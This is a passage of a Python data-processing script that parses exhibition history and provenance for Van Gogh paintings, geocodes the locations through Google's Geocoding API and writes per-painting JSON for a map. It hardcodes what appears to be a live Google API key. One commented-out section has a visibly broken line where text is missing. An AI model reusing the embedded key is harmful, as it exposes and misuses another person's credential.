')\n if '' in exhibitionHistory: exhibitionHistory.remove('') # remove blank rows that come at the end\n\n def pullYear(n):\n exhibitionYear = int(exhibitionHistory[eh].split(',')[-n][-4:])\n # see if this event spans multiple years\n if ('-' in exhibitionHistory[eh]) :\n # if (objectNumber == 436525 and exhibitionYear == 1991) :\n # print(n)\n # print(exhibitionHistory[eh].split(\".\")[0])\n # print(exhibitionHistory[eh])\n if len(exhibitionHistory[eh].split(',')) >= (n+1) :\n if (len(exhibitionHistory[eh].split(',')[-(n+1)].split('-')) > 1) :\n try:\n exhibitionYear2 = int(exhibitionHistory[eh].split(',')[-(n+1)].split('-')[-2])\n if exhibitionYear2 == exhibitionYear-1:\n exhibitionHistoryList.append({\n 'ehid': ehid,\n 'object_number':int(objectNumber),\n 'year': exhibitionYear2,\n 'location': exhibitionLocation,\n 'exhibition': exhibitionHistory[eh]\n })\n exhibitionHistoryList.append({\n 'ehid': ehid,\n 'object_number':int(objectNumber),\n 'year': exhibitionYear,\n 'location': exhibitionLocation,\n 'exhibition': exhibitionHistory[eh]\n })\n else:\n exhibitionHistoryList.append({\n 'ehid': ehid,\n 'object_number':int(objectNumber),\n 'year': exhibitionYear,\n 'location': exhibitionLocation,\n 'exhibition': exhibitionHistory[eh]\n })\n except ValueError:\n exhibitionHistoryList.append({\n 'ehid': ehid,\n 'object_number':int(objectNumber),\n 'year': exhibitionYear,\n 'location': exhibitionLocation,\n 'exhibition': exhibitionHistory[eh]\n })\n else :\n exhibitionHistoryList.append({\n 'ehid': ehid,\n 'object_number': int(objectNumber),\n 'year': exhibitionYear,\n 'location': exhibitionLocation,\n 'exhibition': exhibitionHistory[eh]\n })\n else:\n exhibitionHistoryList.append({\n 'ehid': ehid,\n 'object_number': int(objectNumber),\n 'year': exhibitionYear,\n 'location': exhibitionLocation,\n 'exhibition': exhibitionHistory[eh]\n })\n\n # for each record in the exhibition history I need year, city, and name of exhibition/museum\n for eh in range(len(exhibitionHistory)):\n ehid = str(objectNumber) + '_' + str(eh)\n exhibitionHistory[eh] = exhibitionHistory[eh].replace('–','-')\n if exhibitionHistory[eh].split(\".\")[0] == \"New York\" and exhibitionHistory[eh].split(\".\")[1].strip() == \"The Metropolitan Museum of Art\":\n exhibitionLocation = \"Metropolitan Museum of Art\"\n else:\n exhibitionLocation = exhibitionHistory[eh].split(\".\")[0]\n if len(exhibitionHistory[eh].split(',')) >= 2:\n try:\n pullYear(2)\n except ValueError:\n try:\n pullYear(3)\n except ValueError:\n try:\n pullYear(4)\n except ValueError:\n pullYear(5)\n else:\n # one fringe case, which is 436525, reading Denver Art Museum. 1938 [see Los Angeles 1941].\n exhibitionYear = int(exhibitionHistory[eh].split(' [')[0][-4:])\n exhibitionHistoryList.append({\n 'ehid': ehid,\n 'object_number': int(objectNumber),\n 'year': exhibitionYear,\n 'location': exhibitionLocation,\n 'exhibition': exhibitionHistory[eh]\n })\n\nexhibitionHistoryList = pd.DataFrame(exhibitionHistoryList)\n\nprovenanceList = pd.DataFrame(provenanceList)\nprovenanceList['year'] = provenanceList['year'].astype(int)\nfor index in vanGoghProvenance.index.values:\n objectNumber = vanGoghProvenance['object_number'][index]\n objectYear = vanGoghProvenance['object_year'][index]\n if len(provenanceList.loc[(provenanceList['object_number']==objectNumber) & (provenanceList['year']==objectYear),:]) == 0:\n firstDataPoint = pd.DataFrame({\n 'pid' : str(objectNumber)+'_-1'\n ,'object_number' : int(objectNumber)\n ,'year' : int(objectYear)\n ,'location' : 'Paris'\n ,'owner' : 'the artist'\n # ,columns = [['pid'],['object_number'],['year'],['location'],['owner']]\n }, index=[0])\n provenanceList = provenanceList.append(firstDataPoint,ignore_index=True)\n\nprovenanceList = provenanceList.sort_values(by=['object_number','year'])\n\n\n## Little bit of manual location clean-up\nexhibitionHistoryList.loc[exhibitionHistoryList['location']=='Washington','location'] = 'Washington D.C.'\nexhibitionHistoryList.loc[exhibitionHistoryList['location']=='Zurich','location'] = 'Zürich'\nexhibitionHistoryList.loc[exhibitionHistoryList['location']=='Oxford Arts Club','location'] = 'Oxford'\nprovenanceList.loc[provenanceList['location']=='Zurich','location'] = 'Zürich'\n\n\n### Pull Lat Lng coordinates for all locations from Google Geocoding API once, which I will then join back into Prov and ExhibHistory data\n\nlocationsList = list(provenanceList['location'].unique()) + list(exhibitionHistoryList['location'].unique())\nlocationsList = list(set(locationsList))\n# print(locationsList)\nlocationsGeo = []\nfor l in range(len(locationsList)):\n time.sleep(0.5) # Do two requests per second to avoid issues with Google API Usage Limits - https://developers.google.com/maps/documentation/geocoding/usage-limits\n print(locationsList[l])\n\n city = ''\n state = ''\n sublocality = ''\n country = ''\n\n # # seach google geocoding api to pull LatLng for that location\n coordinates = []\n displayCoordinates = []\n googleAPIKey = 'AIzaSyClejN5Zy--nDKo4SbWM2S2eWyufkMnyEs'\n googleGeocodeBaseURL = 'https://maps.googleapis.com/maps/api/geocode/json?address='\n exhibitionLocationURL = locationsList[l]\n responseURL = googleGeocodeBaseURL+exhibitionLocationURL+'&key='+googleAPIKey\n response = requests.get(responseURL)\n resp_json_payload = response.json()\n if (resp_json_payload['status'] != \"ZERO_RESULTS\"):\n for l in range(len(resp_json_payload['results'][0]['address_components'])):\n if 'locality' in resp_json_payload['results'][0]['address_components'][l]['types']:\n city = resp_json_payload['results'][0]['address_components'][l]['long_name'].replace('Taitō','Tokyo')\n elif 'administrative_area_level_1' in resp_json_payload['results'][0]['address_components'][l]['types']:\n state = ', ' + resp_json_payload['results'][0]['address_components'][l]['short_name']\n elif 'country' in resp_json_payload['results'][0]['address_components'][l]['types']:\n country = resp_json_payload['results'][0]['address_components'][l]['long_name']\n elif 'sublocality' in resp_json_payload['results'][0]['address_components'][l]['types']:\n sublocality = resp_json_payload['results'][0]['address_components'][l]['long_name']\n\n lat = resp_json_payload['results'][0]['geometry']['location']['lat']\n lng = resp_json_payload['results'][0]['geometry']['location']['lng']\n coordinates.append(lat)\n coordinates.append(lng)\n\n if city == '':\n if sublocality == '':\n displayLocation = country\n else:\n if country == 'United States':\n displayLocation = sublocality+state\n else:\n displayLocation = sublocality\n elif country == 'United States':\n displayLocation = city+state\n else:\n displayLocation = city\n\n print(displayLocation)\n\n displayLocationURL = displayLocation + ', ' + country\n displayLocationResponseURL = googleGeocodeBaseURL+displayLocationURL+'&key='+googleAPIKey\n displayResponse = requests.get(displayLocationResponseURL)\n display_resp_json_payload = displayResponse.json()\n if (resp_json_payload['status'] != \"ZERO_RESULTS\"):\n displayLat = display_resp_json_payload['results'][0]['geometry']['location']['lat']\n displayLng = display_resp_json_payload['results'][0]['geometry']['location']['lng']\n displayCoordinates.append(displayLat)\n displayCoordinates.append(displayLng)\n\n print(\"--- %s seconds ---\" % (time.time() - start_time))\n #\n # # add exhibition to exhibitionHistoryList\n #\n locationsGeo.append({\n 'location': locationsList[l],\n 'coordinates': coordinates,\n 'displayLocation': displayLocation,\n 'country': country,\n 'displayCoordinates': displayCoordinates\n })\n\nlocationsGeoDF = pd.DataFrame(locationsGeo)\nlocationsGeoJSON = os.path.join(dir,'locationsGeo.json')\nlocationsGeoDF.to_json(locationsGeoJSON)\n\n'''\n### Join pulled lat lng coordinates into Prov and ExhibHistory\nlocationsGeoJSON = os.path.join(dir,'assets','locationsGeo.json')\nlocationsGeo = pd.read_json(locationsGeoJSON)\nexhibitionHistoryList = pd.merge(exhibitionHistoryList,locationsGeo,on='location',how='left')\nprovenanceList = pd.merge(provenanceList,locationsGeo,on='location',how='left')\nexhibitionHistoryList.columns = ['pid','owner','location','object_number','year','coordinates']\nprovenanceList['data_type'] = 'provenance'\nexhibitionHistoryList['data_type'] = 'exhibition'\n\ncurrentYear = now.year\n\n# print(provenanceList.columns.values)\n# print(exhibitionHistoryList.columns.values)\n# print(exhibitionHistoryList.head(15))\n\nprovAndExhib = pd.concat([provenanceList,exhibitionHistoryList])\nprovAndExhib = provAndExhib.sort_values(by=['object_number','year'],ascending=['True','True']).reset_index()\nprovAndExhibShort = provAndExhib[['location','object_number']]\nprovAndExhibShort = provAndExhibShort.drop_duplicates()\nprint(provAndExhibShort['location'].value_counts())\n''''''\nfor index in vanGoghProvenance.index.values:\n eventSpecificRows = []\n imageName = vanGoghProvenance['image'][index]\n # print(imageName)\n objectNumber = vanGoghProvenance['object_number'][index]\n ownerList = provenanceList.loc[provenanceList['object_number']==objectNumber,'owner'].unique()\n # if objectNumber == 436525:\n for o in range(len(ownerList)):\n owner = ownerList[o]\n ownerRow = provenanceList.loc[(provenanceList['owner']==owner) & (provenanceList['object_number']==objectNumber),:]\n ownerRowIndex = ownerRow.index.values[0]\n if owner == ownerList[0]:\n prevOwner = 'FIRST'\n else:\n prevOwner = ownerList[o-1]\n if owner == ownerList[len(ownerList)-1]:\n nextOwner = 'LAST'\n else:\n nextOwner = ownerList[o+1]\n\n def addOwnerRows(objectNumber,owner,prevOwner,nextOwner):\n ownerRow = provenanceList.loc[(provenanceList['owner']==owner) & (provenanceList['object_number']==objectNumber),:]\n ownerRowIndex = ownerRow.index.values[0]\n\n # prevOwnerRow = provenanceList.loc[(provenanceList['owner']==prevOwner) & (provenanceList['object_number']==objectNumber),:]\n # prevOwnerRowIndex = prevOwnerRow.index.values[0]\n\n # nextOwnerRow = provenanceList.loc[(provenanceList['owner']==nextOwner) & (provenanceList['object_number']==objectNumber),:]\n # nextOwnerRowIndex = nextOwnerRow.index.values[0]\n\n startYear = provenanceList['year'][ownerRowIndex]\n if nextOwner == 'LAST':\n endYear = currentYear\n nextOwnerRowIndex = ownerRowIndex\n else:\n nextOwnerRow = provenanceList.loc[(provenanceList['owner']==nextOwner) & (provenanceList['object_number']==objectNumber),:]\n nextOwnerRowIndex = nextOwnerRow.index.values[0]\n endYear = provenanceList['year'][nextOwnerRowIndex]\n\n ownerExhibitions = exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==objectNumber) & (exhibitionHistoryList['year'] >= startYear) & (exhibitionHistoryList['year'] < endYear),:]\n\n ## Add first line that moves \"to and from\" starting location ##\n if prevOwner == 'FIRST':\n year = int(provenanceList['year'][ownerRowIndex])\n\n coordinates = []\n coordinates.append(provenanceList['coordinates'][ownerRowIndex])\n coordinates.append(provenanceList['coordinates'][ownerRowIndex])\n\n cities = []\n cities.append(provenanceList['location'][ownerRowIndex])\n cities.append(provenanceList['location'][ownerRowIndex])\n\n owners = []\n owners.append(provenanceList['owner'][ownerRowIndex])\n owners.append(provenanceList['owner'][ownerRowIndex])\n\n changeFlag = 1\n\n dataType = 'provenance'\n\n eventSpecificRows.append({\n 'line': {\n 'year': year\n ,'coordinates': coordinates\n ,'cities': cities\n ,'owner': owners\n ,'changeFlag': changeFlag\n ,'dataType': dataType\n }\n })\n\n if len(ownerExhibitions)>0:\n ownerExhibitionIndeces = ownerExhibitions.index.values\n # print(len(ownerExhibitionIndeces))\n year = int(exhibitionHistoryList['year'][ownerExhibitionIndeces[0]])\n\n coordinates = []\n coordinates.append(provenanceList['coordinates'][ownerRowIndex])\n coordinates.append(exhibitionHistoryList['coordinates'][ownerExhibitionIndeces[0]])\n\n cities = []\n cities.append(provenanceList['location'][ownerRowIndex])\n cities.append(exhibitionHistoryList['location'][ownerExhibitionIndeces[0]])\n\n owners = []\n owners.append(provenanceList['owner'][ownerRowIndex])\n owners.append(\"Exhibition - \"+re.sub(\" ([\\(\\[]).*?([\\)\\]])\", \"\", exhibitionHistoryList['owner'][ownerExhibitionIndeces[0]].split('.')[1].replace('\"','')).split(\",\")[0])\n # owners.append(exhibitionHistoryList['owner'][ownerExhibitionIndeces[0]])\n # owners.append(\"On Exhibition\")\n\n changeFlag = 1\n\n dataType = 'exhibition'\n\n eventSpecificRows.append({\n 'line': {\n 'year': year\n ,'coordinates': coordinates\n ,'cities': cities\n ,'owner': owners\n ,'changeFlag': changeFlag\n ,'dataType': dataType\n }\n })\n\n for oe in range(1,len(ownerExhibitionIndeces)):\n year = int(exhibitionHistoryList['year'][ownerExhibitionIndeces[oe]])\n\n coordinates = []\n coordinates.append(exhibitionHistoryList['coordinates'][ownerExhibitionIndeces[oe-1]])\n coordinates.append(exhibitionHistoryList['coordinates'][ownerExhibitionIndeces[oe]])\n\n cities = []\n cities.append(exhibitionHistoryList['location'][ownerExhibitionIndeces[oe-1]])\n cities.append(exhibitionHistoryList['location'][ownerExhibitionIndeces[oe]])\n\n owners = []\n # owners.append(exhibitionHistoryList['owner'][ownerExhibitionIndeces[oe-1]])\n owners.append(\"On Exhibition\")\n # print(exhibitionHistoryList['owner'][ownerExhibitionIndeces[0]].split('.')[1].replace('\"',''))\n # owners.append(exhibitionHistoryList['owner'][ownerExhibitionIndeces[oe]])\n owners.append(\"On Exhibition\")\n\n changeFlag = 1\n\n dataType = 'exhibition'\n\n eventSpecificRows.append({\n 'line': {\n 'year': year\n ,'coordinates': coordinates\n ,'cities': cities\n ,'owner': owners\n ,'changeFlag': changeFlag\n ,'dataType': dataType\n }\n })\n\n year = int(provenanceList['year'][nextOwnerRowIndex])\n\n coordinates = []\n coordinates.append(exhibitionHistoryList['coordinates'][ownerExhibitionIndeces[len(ownerExhibitionIndeces)-1]])\n coordinates.append(provenanceList['coordinates'][nextOwnerRowIndex])\n\n cities = []\n cities.append(exhibitionHistoryList['location'][ownerExhibitionIndeces[len(ownerExhibitionIndeces)-1]])\n cities.append(provenanceList['location'][nextOwnerRowIndex])\n\n owners = []\n # owners.append(exhibitionHistoryList['owner'][ownerExhibitionIndeces[len(ownerExhibitionIndeces)-1]])\n # owners.append(\"On Exhibition\")\n owners.append(\"Exhibition - \"+re.sub(\" ([\\(\\[]).*?([\\)\\]])\", \"\", exhibitionHistoryList['owner'][ownerExhibitionIndeces[len(ownerExhibitionIndeces)-1]].split('.')[1].replace('\"','')).split(\",\")[0])\n # print(re.sub(\" ([\\(\\[]).*?([\\)\\]])\", \"\", exhibitionHistoryList['owner'][ownerExhibitionIndeces[0]].split('.')[1].replace('\"','')).split(\",\")[0])\n owners.append(provenanceList['owner'][nextOwnerRowIndex])\n\n changeFlag = 1\n\n dataType = 'exhibition'\n\n eventSpecificRows.append({\n 'line': {\n 'year': year\n ,'coordinates': coordinates\n ,'cities': cities\n ,'owner': owners\n ,'changeFlag': changeFlag\n ,'dataType': dataType\n }\n })\n\n else:\n # pass\n year = int(provenanceList['year'][nextOwnerRowIndex])\n\n coordinates = []\n coordinates.append(provenanceList['coordinates'][ownerRowIndex])\n coordinates.append(provenanceList['coordinates'][nextOwnerRowIndex])\n\n cities = []\n cities.append(provenanceList['location'][ownerRowIndex])\n cities.append(provenanceList['location'][nextOwnerRowIndex])\n\n owners = []\n owners.append(provenanceList['owner'][ownerRowIndex])\n owners.append(provenanceList['owner'][nextOwnerRowIndex])\n\n changeFlag = 1\n\n dataType = 'provenance'\n\n eventSpecificRows.append({\n 'line': {\n 'year': year\n ,'coordinates': coordinates\n ,'cities': cities\n ,'owner': owners\n ,'changeFlag': changeFlag\n ,'dataType': dataType\n }\n })\n\n\n\n else:\n prevOwnerRow = provenanceList.loc[(provenanceList['owner']==prevOwner) & (provenanceList['object_number']==objectNumber),:]\n prevOwnerRowIndex = prevOwnerRow.index.values[0]\n\n # year = int(provenanceList['year'][ownerRowIndex])\n #\n # coordinates = []\n # coordinates.append(provenanceList['coordinates'][prevOwnerRowIndex])\n # coordinates.append(provenanceList['coordinates'][ownerRowIndex])\n #\n # cities = []\n # cities.append(provenanceList['location'][prevOwnerRowIndex])\n # cities.append(provenanceList['location'][ownerRowIndex])\n #\n # owners = []\n # owners.append(provenanceList['owner'][prevOwnerRowIndex])\n # owners.append(provenanceList['owner'][ownerRowIndex])\n #\n # changeFlag = 1\n #\n # dataType = 'provenance'\n #\n # eventSpecificRows.append({\n # 'line': {\n # 'year': year\n # ,'coordinates': coordinates\n # ,'cities': cities\n # ,'owner': owners\n # ,'changeFlag': changeFlag\n # ,'dataType': dataType\n # }\n # })\n\n\n ### Were there any exhibitions that happened while that person was the owner? ###\n if len(ownerExhibitions)>0:\n ownerExhibitionIndeces = ownerExhibitions.index.values\n # print(len(ownerExhibitionIndeces))\n year = int(ownerExhibitions['year'][ownerExhibitionIndeces[0]])\n\n coordinates = []\n coordinates.append(provenanceList['coordinates'][ownerRowIndex])\n coordinates.append(ownerExhibitions['coordinates'][ownerExhibitionIndeces[0]])\n\n cities = []\n cities.append(provenanceList['location'][ownerRowIndex])\n cities.append(ownerExhibitions['location'][ownerExhibitionIndeces[0]])\n\n owners = []\n owners.append(provenanceList['owner'][ownerRowIndex])\n # owners.append(ownerExhibitions['owner'][ownerExhibitionIndeces[0]])\n # owners.append(\"On Exhibition\")\n owners.append(\"Exhibition - \"+re.sub(\" ([\\(\\[]).*?([\\)\\]])\", \"\", exhibitionHistoryList['owner'][ownerExhibitionIndeces[0]].split('.')[1].replace('\"','')).split(\",\")[0])\n # print(exhibitionHistoryList['owner'][ownerExhibitionIndeces[0]].split('.')[0].replace('\"',''))\n\n changeFlag = 1\n\n dataType = 'exhibition'\n\n eventSpecificRows.append({\n 'line': {\n 'year': year\n ,'coordinates': coordinates\n ,'cities': cities\n ,'owner': owners\n ,'changeFlag': changeFlag\n ,'dataType': dataType\n }\n })\n\n for oe in range(1,len(ownerExhibitionIndeces)):\n year = int(ownerExhibitions['year'][ownerExhibitionIndeces[oe]])\n\n coordinates = []\n coordinates.append(ownerExhibitions['coordinates'][ownerExhibitionIndeces[oe-1]])\n coordinates.append(ownerExhibitions['coordinates'][ownerExhibitionIndeces[oe]])\n\n cities = []\n cities.append(ownerExhibitions['location'][ownerExhibitionIndeces[oe-1]])\n cities.append(ownerExhibitions['location'][ownerExhibitionIndeces[oe]])\n\n owners = []\n # owners.append(ownerExhibitions['owner'][ownerExhibitionIndeces[oe-1]])\n owners.append(\"Exhibition - \"+re.sub(\" ([\\(\\[]).*?([\\)\\]])\", \"\", exhibitionHistoryList['owner'][ownerExhibitionIndeces[oe-1]].replace(\"Mrs.\",\"Mrs\").replace(\"G.\",\"G\").replace(\"R.\",\"R\").replace(\"M.\",\"M\").replace(\"E.\",\"E\").split('.')[1].replace('\"','')).split(\",\")[0])\n owners.append(\"Exhibition - \"+re.sub(\" ([\\(\\[]).*?([\\)\\]])\", \"\", exhibitionHistoryList['owner'][ownerExhibitionIndeces[oe]].replace(\"Mrs.\",\"Mrs\").replace(\"G.\",\"G\").replace(\"R.\",\"R\").replace(\"M.\",\"M\").replace(\"E.\",\"E\").split('.')[1].replace('\"','')).split(\",\")[0])\n # owners.append(\"On Exhibition\")\n # owners.append(\"On Exhibition\")\n # print(exhibitionHistoryList['owner'][ownerExhibitionIndeces[0]].split('.')[1].replace('\"',''))\n\n changeFlag = 1\n\n dataType = 'exhibition'\n\n eventSpecificRows.append({\n 'line': {\n 'year': year\n ,'coordinates': coordinates\n ,'cities': cities\n ,'owner': owners\n ,'changeFlag': changeFlag\n ,'dataType': dataType\n }\n })\n\n if nextOwner == 'LAST':\n year = int(ownerExhibitions['year'][ownerExhibitionIndeces[len(ownerExhibitionIndeces)-1]])\n else:\n year = int(provenanceList['year'][nextOwnerRowIndex])\n\n coordinates = []\n coordinates.append(ownerExhibitions['coordinates'][ownerExhibitionIndeces[len(ownerExhibitionIndeces)-1]])\n coordinates.append(provenanceList['coordinates'][nextOwnerRowIndex])\n\n cities = []\n cities.append(ownerExhibitions['location'][ownerExhibitionIndeces[len(ownerExhibitionIndeces)-1]])\n cities.append(provenanceList['location'][nextOwnerRowIndex])\n\n owners = []\n # owners.append(ownerExhibitions['owner'][ownerExhibitionIndeces[len(ownerExhibitionIndeces)-1]])\n # owners.append(\"On Exhibition\")\n owners.append(\"Exhibition - \"+re.sub(\" ([\\(\\[]).*?([\\)\\]])\", \"\", exhibitionHistoryList['owner'][ownerExhibitionIndeces[len(ownerExhibitionIndeces)-1]].replace(\"Mrs.\",\"Mrs\").replace(\"G.\",\"G\").replace(\"R.\",\"R\").replace(\"M.\",\"M\").replace(\"E.\",\"E\").replace(\"J.\",\"J\").replace(\"Alex.\",\"Alex\").split('.')[1].replace('\"','')).split(\",\")[0])\n owners.append(provenanceList['owner'][nextOwnerRowIndex])\n\n changeFlag = 1\n\n dataType = 'provenance'\n\n eventSpecificRows.append({\n 'line': {\n 'year': year\n ,'coordinates': coordinates\n ,'cities': cities\n ,'owner': owners\n ,'changeFlag': changeFlag\n ,'dataType': dataType\n }\n })\n\n else:\n # pass\n year = int(provenanceList['year'][nextOwnerRowIndex])\n\n coordinates = []\n coordinates.append(provenanceList['coordinates'][ownerRowIndex])\n coordinates.append(provenanceList['coordinates'][nextOwnerRowIndex])\n\n cities = []\n cities.append(provenanceList['location'][ownerRowIndex])\n cities.append(provenanceList['location'][nextOwnerRowIndex])\n\n owners = []\n owners.append(provenanceList['owner'][ownerRowIndex])\n owners.append(provenanceList['owner'][nextOwnerRowIndex])\n\n changeFlag = 1\n\n dataType = 'provenance'\n\n eventSpecificRows.append({\n 'line': {\n 'year': year\n ,'coordinates': coordinates\n ,'cities': cities\n ,'owner': owners\n ,'changeFlag': changeFlag\n ,'dataType': dataType\n }\n })\n\n # print(str(startYear) + '-' + str(endYear))\n\n addOwnerRows(objectNumber,owner,prevOwner,nextOwner)\n\n\n # print(eventSpecificRows)\n '''\n'''\n jsonLINE = []\n\n def addProvenance(column,listName):\n for x in provenanceList.loc[(provenanceList['object_number']==vanGoghProvenance['object_number'][index]) & (provenanceList['year']==y),column].index.values:\n listName.append(provenanceList.loc[(provenanceList['object_number']==vanGoghProvenance['object_number'][index]) & (provenanceList['year']==y),column][x])\n\n def addPrevProvenance(column,listName):\n provIndex = provenanceList.loc[(provenanceList['object_number']==vanGoghProvenance['object_number'][index]) & (provenanceList['year']==y),column].index.values\n provIndex = provIndex[0]\n if provIndex == 0:\n newIndex = 0\n else:\n newIndex = provIndex-1\n if provenanceList['object_number'][newIndex] == provenanceList['object_number'][provIndex]:\n listName.append(provenanceList[column][newIndex])\n\n def addCurrentProvenance(column,listName):\n prevIndex = provenanceList.loc[(provenanceList['object_number']==vanGoghProvenance['object_number'][index]) & (provenanceList['year']= 1):\n ## If there were exhibitions in that year ###\n if (len(exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y)]) > 0):\n ehidList = exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y),'ehid'].unique()\n ### If an exhibition spanned into the next year ##\n if len(exhibitionHistoryList.loc[(exhibitionHistoryList['ehid'].isin(ehidList)) & (exhibitionHistoryList['year']==y+1)]) > 0:\n ## no examples of this, but adding just in case for the future ##\n ### Add all ownership changing hands, then all exhibitions ###\n coordinates = []\n addPrevProvenance('coordinates',coordinates)\n addProvenance('coordinates',coordinates)\n addExhibition('coordinates',coordinates)\n\n cities = []\n addPrevProvenance('location',cities)\n addProvenance('location',cities)\n addExhibition('location',cities)\n\n owners = []\n addPrevProvenance('owner',owners)\n addProvenance('owner',owners)\n addExhibition('exhibition',owners)\n\n changeFlag = []\n changeFlag.append(1)\n\n dataType = []\n for cd in range(len(exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y)])):\n dataType.append(\"exhibition\")\n dataType.append(\"provenance\")\n for cd in range(len(provenanceList.loc[(provenanceList['object_number']==vanGoghProvenance['object_number'][index]) & (provenanceList['year']==y)])):\n dataType.append(\"provenance\")\n\n print(len(coordinates))\n # addToJSONLine()\n\n\n ### If an exhibition spanned into the past year ##\n elif len(exhibitionHistoryList.loc[(exhibitionHistoryList['ehid'].isin(ehidList)) & (exhibitionHistoryList['year']==y-1)]) > 0:\n ### Add all exhibitions, then new ownership changing hands ###\n coordinates = []\n addExhibition('coordinates',coordinates)\n addProvenance('coordinates',coordinates)\n\n cities = []\n addExhibition('location',cities)\n addProvenance('location',cities)\n\n owners = []\n addExhibition('exhibition',owners)\n addProvenance('owner',owners)\n\n changeFlag = []\n changeFlag.append(1)\n\n dataType = []\n for cd in range(len(exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y)])):\n dataType.append(\"exhibition\")\n for cd in range(len(provenanceList.loc[(provenanceList['object_number']==vanGoghProvenance['object_number'][index]) & (provenanceList['year']==y)])):\n dataType.append(\"provenance\")\n\n addToJSONLine()\n\n ### Ehibition was only in this year ###\n else:\n ### Add first owner then all exhibitions, then new ownership ###\n coordinates = []\n addPrevProvenance('coordinates',coordinates)\n addExhibition('coordinates',coordinates)\n addProvenance('coordinates',coordinates)\n\n cities = []\n addPrevProvenance('location',cities)\n addExhibition('location',cities)\n addProvenance('location',cities)\n\n owners = []\n addPrevProvenance('owner',owners)\n addExhibition('exhibition',owners)\n addProvenance('owner',owners)\n\n changeFlag = []\n changeFlag.append(1)\n\n dataType = []\n dataType.append(\"provenance\")\n for cd in range(len(exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y)])):\n dataType.append(\"exhibition\")\n for cd in range(len(provenanceList.loc[(provenanceList['object_number']==vanGoghProvenance['object_number'][index]) & (provenanceList['year']==y)])):\n dataType.append(\"provenance\")\n\n addToJSONLine()\n\n\n else :\n ### This is where owners change hands once without exhibitions int that year. ###\n coordinates = []\n addPrevProvenance('coordinates',coordinates)\n addProvenance('coordinates',coordinates)\n\n cities = []\n addPrevProvenance('location',cities)\n addProvenance('location',cities)\n\n owners = []\n addPrevProvenance('owner',owners)\n addProvenance('owner',owners)\n\n changeFlag = []\n changeFlag.append(1)\n\n dataType = []\n dataType.append(\"provenance\")\n for cd in range(len(provenanceList.loc[(provenanceList['object_number']==vanGoghProvenance['object_number'][index]) & (provenanceList['year']==y)])):\n dataType.append(\"provenance\")\n\n addToJSONLine()\n\n ### This is where no ownership changes hands ###\n else:\n ### Is there an exhibition in this year? ###\n if (len(exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y)]) > 0):\n ehidList = exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y),'ehid'].unique()\n ### If an exhibition spanned into the next year ##\n if len(exhibitionHistoryList.loc[(exhibitionHistoryList['ehid'].isin(ehidList)) & (exhibitionHistoryList['year']==y+1)]) > 0:\n ## Goes from current owner to exhibitions\n coordinates = []\n addCurrentProvenance('coordinates',coordinates)\n addExhibition('coordinates',coordinates)\n\n cities = []\n addCurrentProvenance('location',cities)\n addExhibition('location',cities)\n\n owners = []\n addCurrentProvenance('owner',owners)\n addExhibition('exhibition',owners)\n\n changeFlag = []\n changeFlag.append(1)\n\n dataType = []\n dataType.append(\"provenance\")\n for cd in range(len(exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y)])):\n dataType.append(\"exhibition\")\n\n addToJSONLine()\n\n ### If an exhibition spanned into the past year ##\n elif len(exhibitionHistoryList.loc[(exhibitionHistoryList['ehid'].isin(ehidList)) & (exhibitionHistoryList['year']==y-1)]) > 0:\n ## Goes from exhibitions back to current owner\n coordinates = []\n addExhibition('coordinates',coordinates)\n addCurrentProvenance('coordinates',coordinates)\n\n cities = []\n addExhibition('location',cities)\n addCurrentProvenance('location',cities)\n\n owners = []\n addExhibition('exhibition',owners)\n addCurrentProvenance('owner',owners)\n\n changeFlag = []\n changeFlag.append(1)\n\n dataType = []\n for cd in range(len(exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y)])):\n dataType.append(\"exhibition\")\n dataType.append(\"provenance\")\n\n addToJSONLine()\n\n ### Ehibition was only in this year ###\n else:\n # if (objectNumber == 436525 and year == 1991):\n # print(exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y)])\n ## Goes from current owner to exhibitions, back to current owner\n coordinates = []\n addCurrentProvenance('coordinates',coordinates)\n addExhibition('coordinates',coordinates)\n addCurrentProvenance('coordinates',coordinates)\n\n cities = []\n addCurrentProvenance('location',cities)\n addExhibition('location',cities)\n addCurrentProvenance('location',cities)\n\n owners = []\n addCurrentProvenance('owner',owners)\n addExhibition('exhibition',owners)\n addCurrentProvenance('owner',owners)\n\n changeFlag = []\n changeFlag.append(1)\n\n dataType = []\n dataType.append(\"provenance\")\n for cd in range(len(exhibitionHistoryList.loc[(exhibitionHistoryList['object_number']==vanGoghProvenance['object_number'][index]) & (exhibitionHistoryList['year']==y)])):\n dataType.append(\"exhibition\")\n dataType.append(\"provenance\")\n\n addToJSONLine()\n\n else:\n pass\n ## current provenance ##\n # coordinates = []\n # addCurrentProvenance('coordinates',coordinates)\n #\n # cities = []\n # addCurrentProvenance('location',cities)\n #\n # owners = []\n # addCurrentProvenance('owner',owners)\n #\n # changeFlag = []\n # changeFlag.append(0)\n #\n # dataType = []\n # dataType.append(\"provenance\")\n #\n # addToJSONLine()\n '''\n\n'''\n jsonLINEExport = {\n 'objects': eventSpecificRows\n ,'imageName':imageName\n ,'objectNumber':str(objectNumber)\n }\n\n\n # print(jsonLINEExport);\n\n\n ## Export a JSON for each painting ###\n jsonExportName = 'jsonLINE2' + vanGoghProvenance['image'][index].split('.')[0] + '.json'\n jsonExportPath = os.path.join(dir,'assets/'+jsonExportName)\n js = json.dumps(jsonLINEExport)\n fp = open(jsonExportName, 'a')\n fp.write(js)\n fp.close()\n print(\"added \" + jsonExportName)\n print(\"--- %s seconds 